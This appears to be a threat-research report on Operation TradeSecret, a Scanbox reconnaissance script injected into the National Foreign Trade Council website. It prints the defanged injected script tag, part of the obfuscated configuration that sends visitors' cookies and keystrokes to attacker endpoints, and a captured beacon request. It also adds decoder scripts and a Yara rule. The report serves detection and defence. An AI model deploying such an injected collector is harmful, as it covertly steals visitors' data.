The Fidelis Threat Research team is comprised of expert security researchers whose sole focus is generating accurate and actionable intelligence to better secure customers.
In late February, Fidelis Cybersecurity observed a strategic web compromise of a prominent U.S. lobbying group's website that served malware to a very specific set of targets. In our own observations, and according to previously published research, the malware involved has been used exclusively by Chinese nation-state threat actors.
Based on our observations, we estimate that it is highly probable that this activity, which we are calling ‘Operation TradeSecret’, targeted key private-sector players involved in lobbying efforts around United States foreign trade policy. Subsequent research led us to recover artifacts indicating that a similar operation was conducted by threat actors targeting government officials in Japan. The connections we can draw from the Japanese campaign lead us to estimate that it is highly probable that the actors involved are the group known as APT10 (aka Stone Panda) in the threat research community.
Trade policy was at the center of the recent U.S. presidential election and is sure to feature prominently on the agenda when President Trump meets for the first time with Chinese President Xi Jinping in Florida this week.
This paper documents our findings around the live campaign we observed, as well as technical details to allow other researchers to extend visibility into these actions. Fidelis Cybersecurity products detect all activity described in this report.
Between February 27 and March 1, Fidelis observed that specific pages on the website of the National Foreign Trade Council (NFTC) included a link to a remotely hosted script that executed in the browser of anyone who visited those pages. That remote script was the Scanbox framework, a well-known web reconnaissance tool that has been observed in previous campaigns dating back to at least 2014.
We first observed the inject on the registration page for a board of directors meeting in Washington D.C., scheduled for March 7, 2017.
The injected link would run the Scanbox framework on the computer of anyone who visited the web page.
Scanbox provides multiple capabilities to threat actors. It enumerates the versions of the applications and browser plugins present on the visitor's machine, and it carries other selected tools, such as a JavaScript keylogger. The information gathered through this reconnaissance can be used in phishing campaigns directed toward targeted individuals; those campaigns can then exploit specific vulnerabilities known to exist in the user's applications.
The injected link led to a site called personanddog[ . ]info, a domain registered on January 1, 2017. The malicious JavaScript was served from the sub-domain club.personanddog[ . ]info, which was hosted at the IP address 198.100.119[ . ]4 and was pointed at a non-routable IP address on March 1, 2017.
The link from the NFTC site was removed on March 2. In our observation, the link was removed after the Scanbox site was taken down. We believe that the operation had almost certainly concluded by that time.
Scanbox was previously reported to have been used by multiple Chinese actor groups that are believed to be state sponsored, including the ones thought to be behind well-publicized intrusions in recent years — namely, the Anthem Healthcare and the U.S. Office of Personnel Management (OPM) breaches.
Fidelis has made other observations of Scanbox in various campaigns. In the most recent incident, we observed it inserted on a Uyghur cultural news site. The Uyghurs are an ethnic minority group in China's Xinjiang region, where a struggle for political rights has been ongoing for a few decades. In that instance, the framework was hosted at support1.freetcp[ . ]com.
The organizations represented on the NFTC board of directors include some of the largest U.S. private-sector companies, which presumably have a keen interest in U.S. trade policy. Since the strategic web compromise was observed on the registration page for the board of directors meeting, it can be surmised that the campaign targeted the individuals visiting the site to register for the meeting.
NFTC members have been key participants in the dialogue around the composition of the new trade policy framework being formulated within the Trump administration. One example of this is the advocacy for the appointment of a new U.S. Trade Representative, as evidenced by a statement issued by the Chair of the NFTC on February 13.
All organizations that have representatives on the board of directors of the NFTC — or those who would have a reason to visit the site — should investigate potentially impacted hosts using indicators provided in this report. Since the reconnaissance tool is typically used to enable future targeting campaigns, it should be assumed that targeted individuals will be subject to further attacks — such as spearphishing campaigns.
Fidelis Cybersecurity conveyed its findings to the NFTC shortly after our initial observations.
Scanbox is a framework written in JavaScript and PHP that allows an attacker to perform reconnaissance and keylogging of visitors to a compromised website without any malware being downloaded or installed. According to PwC, the Scanbox framework has been utilized by a number of groups that conduct espionage attacks, including those behind the 2014/15 Forbes and Anthem attacks. Some of the actors known to have used it are referred to as C0d0s0 and Deep Panda within the research community.
According to PwC and AlienVault, the Scanbox framework has various plugins that will load depending on the browser.
Plugins:
* Software reconnaissance / Enumeration
* Browser plugin (Browser version)
* Adobe Flash recon / Enumerates Adobe Flash versions
* Adobe PDF reader recon / Enumerates Acrobat Reader versions
* SharePoint recon
* Chrome security plugins recon
* Microsoft Office recon / Enumerates Microsoft Office versions
* Java recon / Enumerates Java versions
* Internal IP recon
* JavaScript keylogger (implements keylogging functionality through JavaScript that logs all the keystrokes the victim types inside the compromised website; no malware executable needs to be deployed to the system)
Other features identified are:
* Operating system id
* Local Time on the system
* Language settings
* Antivirus installed
Reconnaissance is used to allow attackers to later launch attacks against system vulnerabilities based on data obtained from the system.
In the NFTC page, the injected code was:
<script src=hxxp://club.personanddog[ . ]info/file/i/?1>
The above reference points to “1.js” on that server. Research on this domain led us to the following “1.js” file on VirusTotal, which appears to be the one hosted at the referenced domain: c88b11367a1f4625d4e7a8fb3a45f4c5.
The “1.js” file was first submitted to VirusTotal and Hybrid-Analysis[ . ]com on March 1, 2017. As of March 7, 2017, this Scanbox script had zero (0) AV detections at a popular scanner. During analysis we found that it is an obfuscated version of the Scanbox script: variable and function names have been changed in order to bypass classic signature detection.
When the observed Scanbox script runs, the visitor's browser makes a series of requests back to club.personanddog[ . ]info; the endpoints it posts to are visible in the de-obfuscated configuration that follows.
The “1.js” Scanbox script (MD5: c88b11367a1f4625d4e7a8fb3a45f4c5) consists of obfuscated JavaScript.
To draw a clear connection between the de-obfuscated version of the 1.js script and the raw Scanbox script, consider the following section from the code:
var NztCm_NcDkh={};
NztCm_NcDkh["basicposturl"]="hxxp://club.personanddog[ . ]info/file/i/recv.php";
NztCm_NcDkh["basicliveurl"]="hxxp://club.personanddog[ . ]info/file/i/s.php";
NztCm_NcDkh["basicplguinurl"]="hxxp://club.personanddog[ . ]info/file/i/p.php";
NztCm_NcDkh["basicposturlkeylogs"]="hxxp://club.personanddog[ . ]info/file/i/k.php";
NztCm_NcDkh["info"] = {};
NztCm_NcDkh["info"]["projectid"]=1;
NztCm_NcDkh["info"]["seed"]=__$_$_$_$__$_618__$_$_$_$__$_128();
NztCm_NcDkh["info"]["ip"] = "[ip_of_visitor_removed_by_analyst]";
NztCm_NcDkh["info"]["referrer"] = window["document"]["referrer"];
NztCm_NcDkh["info"]["agent"] = window["navigator"]["userAgent"];
NztCm_NcDkh["info"]["location"] = window["location"]["href"];
NztCm_NcDkh["info"]["toplocation"] = window["top"]["location"]["href"];
NztCm_NcDkh["info"]["cookie"] = window["document"]["cookie"];
NztCm_NcDkh["info"]["title"] = window["document"]["title"];
NztCm_NcDkh["info"]["domain"] = window["document"]["domain"];
NztCm_NcDkh["info"]["charset"] = window["document"]["characterSet"] ? window["document"]["characterSet"]: window["document"]["charset"];
NztCm_NcDkh["info"]["screen"] = function()
After renaming the object and collapsing the bracket-notation property access into dot notation, the same segment clearly matches the Scanbox script that multiple researchers have reported:
var scanbox={};
scanbox.basicposturl="hxxp://club.personanddog[ . ]info/file/i/recv.php";
scanbox.basicliveurl="hxxp://club.personanddog[ . ]info/file/i/s.php";
scanbox.basicplguinurl="hxxp://club.personanddog[ . ]info/file/i/p.php";
scanbox.basicposturlkeylogs="hxxp://club.personanddog[ . ]info/file/i/k.php";
scanbox.info = {};
scanbox.info.projectid=1;
scanbox.info.seed=setRecordid();
scanbox.info.ip = "[ip_of_visitor_removed_by_analyst]";
scanbox.info.referrer = document.referrer;
scanbox.info.agent = navigator.userAgent;
scanbox.info.location = location.href;
scanbox.info.toplocation = top.location.href;
scanbox.info.cookie = document.cookie;
scanbox.info.title = document.title;
scanbox.info.domain = document.domain;
scanbox.info.charset = document.characterSet ? document.characterSet: document.charset;
scanbox.info.screen = function()
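The replacements described above can be mechanized. The following Python script is an added example written for this page; it is not Fidelis code and not part of the recovered 1.js. It rewrites bracket-notation string-key access (window["document"]["referrer"]) into dot notation, drops the redundant window. prefix, and renames the two obfuscated identifiers from a table supplied by the analyst. The sample input is a constructed excerpt of the de-obfuscated lines shown above with their string quotes restored; the renaming table (NztCm_NcDkh to scanbox, the $-laden function to setRecordid) is a judgment made by comparing against the public Scanbox source, not something the script infers on its own.

```python
import re

# Constructed sample: an excerpt of the obfuscated 1.js configuration quoted
# above, with the string literals of the bracket-notation access restored.
# It illustrates the obfuscation style; it is not a copy of the full script.
OBFUSCATED = '''var NztCm_NcDkh={};
NztCm_NcDkh["basicposturl"]="hxxp://club.personanddog[ . ]info/file/i/recv.php";
NztCm_NcDkh["basicposturlkeylogs"]="hxxp://club.personanddog[ . ]info/file/i/k.php";
NztCm_NcDkh["info"] = {};
NztCm_NcDkh["info"]["projectid"]=1;
NztCm_NcDkh["info"]["seed"]=__$_$_$_$__$_618__$_$_$_$__$_128();
NztCm_NcDkh["info"]["referrer"] = window["document"]["referrer"];
NztCm_NcDkh["info"]["toplocation"] = window["top"]["location"]["href"];
NztCm_NcDkh["info"]["charset"] = window["document"]["characterSet"] ? window["document"]["characterSet"]: window["document"]["charset"];
'''

# Analyst-supplied renames (assumption based on comparing the excerpt with the
# public Scanbox source): the opaque object is Scanbox's "scanbox" object and
# the seed function is its setRecordid(). The script does not derive these.
RENAMES = {
    "NztCm_NcDkh": "scanbox",
    "__$_$_$_$__$_618__$_$_$_$__$_128": "setRecordid",
}

# obj["prop"] / obj['prop'] where prop is a legal JavaScript identifier
BRACKET_KEY = re.compile(r'''\[(["'])([A-Za-z_$][\w$]*)\1\]''')
# "window." used only as a prefix to a global (window.document -> document)
WINDOW_PREFIX = re.compile(r'(?<![\w$.])window\.')


def to_dot_notation(src: str) -> str:
    """Rewrite bracket access with a literal identifier key into dot access."""
    return BRACKET_KEY.sub(r'.\2', src)


def drop_window_prefix(src: str) -> str:
    """Remove the explicit global-object prefix the obfuscator inserted."""
    return WINDOW_PREFIX.sub('', src)


def rename_identifiers(src: str, renames: dict) -> str:
    """Replace whole identifiers only. '$' is a legal identifier character in
    JavaScript, so a plain word-boundary anchor would split these names."""
    for old, new in renames.items():
        pattern = r'(?<![\w$])' + re.escape(old) + r'(?![\w$])'
        src = re.sub(pattern, new, src)
    return src


def deobfuscate(src: str, renames: dict) -> str:
    """Apply the three normalizations in the order an analyst would."""
    return rename_identifiers(drop_window_prefix(to_dot_notation(src)), renames)


def extract_beacon_urls(src: str) -> list:
    """Collect the defanged endpoints assigned in the configuration, in order.
    Values are quoted, so the match ends at the closing quote; the defanged
    host contains spaces, which is why whitespace is not used as a delimiter."""
    return re.findall(r'hxxps?://[^"\']+', src)


if __name__ == "__main__":
    print(deobfuscate(OBFUSCATED, RENAMES))
    print(extract_beacon_urls(OBFUSCATED))
```

This is a text-level heuristic for the specific style seen in 1.js (string-key property access plus renamed identifiers), not a JavaScript parser; it would mangle a script that legitimately uses the word window inside a string. For an obfuscator that also encodes the string literals themselves, decode those first, then run this normalization.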
Open-source research led us to discover multiple requests associated with the Scanbox domain.
This information leads us to believe that the Scanbox script could also have been injected into the following pages on the NFTC website:
Report completed on “2017-02-27 15:16:39 CET”
Referer: www[ . ]nftc[ . ]org/calendar/calendar.asp?Mode=CalendarViewDetails&ID=847
Page info recorded:
NTFC Board of Directors Meeting
March 7, 2016
9:00 am – 1:00 pm
Hosted by Google
Report completed on “2017-02-28 00:14:04 CET”
Referer: www[ . ]nftc[ . ]org/calendar/calendar.asp?Mode=CalendarViewDetails&ID=861
Page info recorded:
NTFC Board Dinner with Mexico’s Ambassador, Geronimo Gutierrez (By Invitation)
March 7th
RSVP
Report completed on “2017-02-28 09:19:36 CET”
Referer: www[ . ]nftc[ . ]org/?id=1
Report completed on “2017-02-28 11:20:37 CET”
Referer: www[ . ]nftc[ . ]org/?id=1
Report completed on “2017-03-01 01:53:08 CET”
Referer: www[ . ]nftc[ . ]org/newsflash/newsflash.asp?id=236&mode=View&articleid=3222
Page info recorded:
NFTC Welcomes New Chairman Ambassador Alan Wolf
Date: 3/1/2011
Written by: Jennifer Cummings, The Fratelli Group for NFTC, (202) 822-9491
As we expanded our research scope, we found a second Scanbox script (MD5: b344820e8f719d22bf8d6f939bc40b44). It appears to have been submitted from an IP address in South Korea on March 14, 2017. As of that day, none of the fifty-five (55) AV engines running at VirusTotal detected this obfuscated JavaScript.
It should be noted that we have discovered this artifact in a malware repository and not in a live operation. We have also observed that it uses the precise JavaScript obfuscation technique that we decoded in the NFTC site inject.
When the script is accessed, the victim system beacons to www[ . ]anzen.mofa-go-jp[ . ]com, a domain masquerading as anzen.mofa.go.jp, the Overseas Safety site of Japan's Ministry of Foreign Affairs. This domain is specifically listed in the Operation Cloud Hopper report.
The following traffic was observed:
POST /images/i/recv.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: [removed_by_analyst]
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: www[ . ]anzen.mofa-go-jp[ . ]com
Content-Length: 689
Connection: Keep-Alive
Cache-Control: no-cache
projectidx-87283=Mg%3D%3D&seedx-87283=MTE0NDE0OTAyOTUxMTE2NTY%3D&ipx-87283=MTA0LjIzNi4yMjMuMTYw&referrerx-87283=&agentx-87283=TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMTsgU1YxOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuMC4wNDUwNi42NDg7IC5ORVQgQ0xSIDMuNS4yMTAyMjsgLk5FVDQuMEMp&locationx-87283=[base64_data_removed_by_analyst]&toplocationx-87283=[base64_data_removed_by_analyst]&cookiex-87283=cmVjb3JkaWQ9MTE0NDE0OTAyOTUxMTE2NTY%3D&titlex-87283=&domainx-87283=[base64_data_removed_by_analyst]%3D&charsetx-87283=d2luZG93cy0xMjUy&screenx-87283=MTY3Mng4MDU%3D&platformx-87283=V2luMzI%3D&langx-87283=ZW4tdXM%3D&random=x-87283
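To make a beacon like the one above readable, here is an added Python decoder (example code written for this page, not a Fidelis tool). It takes a recv.php POST body, strips the per-session suffix that Scanbox appends to every field name (recovered from the trailing random= parameter rather than guessed), and base64-decodes each value. The sample body is constructed from the capture above with the analyst-redacted location, toplocation and domain fields omitted. It also reports whether the seed equals the recordid cookie value; in this capture the two are identical, which is consistent with the setRecordid() call seen in the de-obfuscated configuration.

```python
import base64
import binascii
from urllib.parse import parse_qsl

# Constructed sample: the recv.php POST body captured above, keeping only the
# fields the analyst left unredacted (location, toplocation and domain are
# omitted). The "x-87283" suffix and trailing random= parameter are as seen.
SAMPLE_BODY = (
    "projectidx-87283=Mg%3D%3D"
    "&seedx-87283=MTE0NDE0OTAyOTUxMTE2NTY%3D"
    "&ipx-87283=MTA0LjIzNi4yMjMuMTYw"
    "&referrerx-87283="
    "&agentx-87283=TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMTsgU1YxOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuMC4wNDUwNi42NDg7IC5ORVQgQ0xSIDMuNS4yMTAyMjsgLk5FVDQuMEMp"
    "&cookiex-87283=cmVjb3JkaWQ9MTE0NDE0OTAyOTUxMTE2NTY%3D"
    "&titlex-87283="
    "&charsetx-87283=d2luZG93cy0xMjUy"
    "&screenx-87283=MTY3Mng4MDU%3D"
    "&platformx-87283=V2luMzI%3D"
    "&langx-87283=ZW4tdXM%3D"
    "&random=x-87283"
)


def _b64_text(value: str) -> str:
    """Base64-decode one field. Empty fields (no referrer, no title) stay
    empty; anything that is not valid base64 is returned tagged, not dropped."""
    if not value:
        return ""
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return "<not base64: %s>" % value


def parse_scanbox_post(body: str) -> dict:
    """Decode a Scanbox recv.php POST body into {field: plaintext}.

    Every field name carries a per-session suffix (here "x-87283"). The
    script also sends that suffix verbatim as the value of the trailing
    "random" parameter, so it is read from there and stripped, which makes
    the keys line up with the scanbox.info object in the script.
    """
    params = parse_qsl(body, keep_blank_values=True)
    suffix = dict(params).get("random", "")
    fields = {}
    for key, value in params:
        if key == "random":
            continue
        if suffix and key.endswith(suffix):
            key = key[: -len(suffix)]
        fields[key] = _b64_text(value)
    return fields


def seed_matches_cookie(fields: dict) -> bool:
    """True when the session seed equals the recordid cookie the page carries."""
    cookies = dict(
        pair.split("=", 1)
        for pair in fields.get("cookie", "").split("; ")
        if "=" in pair
    )
    return cookies.get("recordid") == fields.get("seed")


if __name__ == "__main__":
    decoded = parse_scanbox_post(SAMPLE_BODY)
    for name, text in decoded.items():
        print("%-10s %s" % (name, text))
    print("seed matches recordid cookie:", seed_matches_cookie(decoded))
```

Decoding the sample gives projectid 2 (the NFTC inject above was configured with projectid 1), a Win32 client reporting a windows-1252 charset, an en-us locale, a 1672x805 screen, and the same Internet Explorer 6 User-Agent as the HTTP header, with the seed equal to the recordid cookie. The suffix handling is the detail to carry into detection logic: a rule matching on literal field names such as projectid= will miss these beacons, whereas matching the random= parameter together with base64-looking values for every other field will not.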
The following Yara rule could be used to detect the obfuscated version of the Scanbox Framework script observed in this research:
rule apt_all_JavaScript_ScanboxFramework_obfuscated
{
    strings:
        $sa1 = /(var|new|return)\s[_$]+\s?/
        $sa2 = "function"
        $sa3 = "toString"
        $sa4 = "toUpperCase"
        $sa5 = "arguments.length"
        $sa6 = "return"
        $sa7 = "while"
        $sa8 = "unescape("
        $sa9 = "365*10*24*60*60*1000"
        $sa10 = ">> 2"
        $sa11 = "& 3) << 4"
        $sa12 = "& 15) << 2"
        $sa13 = ">> 6) | 192"
        $sa14 = "& 63) | 128"
        $sa15 = ">> 12) | 224"
    condition:
        all of them
}